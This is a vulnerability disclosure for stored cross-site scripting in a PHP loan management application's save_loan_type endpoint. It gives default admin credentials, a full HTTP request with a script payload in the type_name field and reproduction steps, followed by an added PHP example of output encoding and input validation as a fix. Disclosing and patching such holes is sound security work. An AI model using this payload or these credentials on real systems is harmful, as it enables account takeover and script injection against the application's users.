Vul_Author: Kai Wang
Login Account: admin, Password: admin123
Vulnerability File: /Loan/ajax.php
Vulnerability location: /Loan/ajax.php?action=save_loan_type
[+] Payload: <script>alert(1)</script>
Tested on Windows 10, phpStudy
Example request with the alert payload:
POST /Loan/ajax.php?action=save_loan_type HTTP/1.1
Host: 10.12.180.79
Content-Length: 362
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Origin: http://10.12.180.79
Referer: http://10.12.180.79/Loan/index.php?page=loan_type
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
Connection: close

------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="type_name"

<script>alert(1)</script>
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="description"

test loans
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI--
Go to the Loan Types page and click the edit button, as shown in the image.
Enter an XSS script in the 'Type' input box.
Click Save and you will see an alert.
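
One way to close this on the server side, as an added example (not the application's own code): validate type_name when it is saved and HTML-encode every stored field when the Loan Types list is rendered. The function names, the allowlist policy and the sample row are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not code from the Loan application.

// Encode a stored value for an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate type_name on save; reject bad input instead of rewriting it.
// Assumed policy: letters, digits, spaces and light punctuation, 1-100 chars.
function validate_type_name(string $raw): ?string
{
    $name = trim($raw);
    if (!preg_match('/^[\p{L}\p{N} .,&()\-]{1,100}$/u', $name)) {
        return null;
    }
    return $name;
}

// Render one row of the loan types table with every field encoded,
// so rows stored before validation existed are displayed as inert text.
function render_loan_type_row(array $row): string
{
    return sprintf(
        '<tr><td>%s</td><td>%s</td></tr>',
        h((string) $row['type_name']),
        h((string) $row['description'])
    );
}

// Constructed sample: the values from the request above, as if already stored.
$stored = [
    'type_name'   => '<script>alert(1)</script>',
    'description' => 'test loans',
];

// The markup is emitted as entity-encoded text, not as a script element.
echo render_loan_type_row($stored), PHP_EOL;

// The payload fails validation; an ordinary name passes.
var_dump(validate_type_name($stored['type_name']));
var_dump(validate_type_name('Small Business'));
```

Encoding at output is the control that neutralizes values already in the database; the save-time check only keeps new markup out.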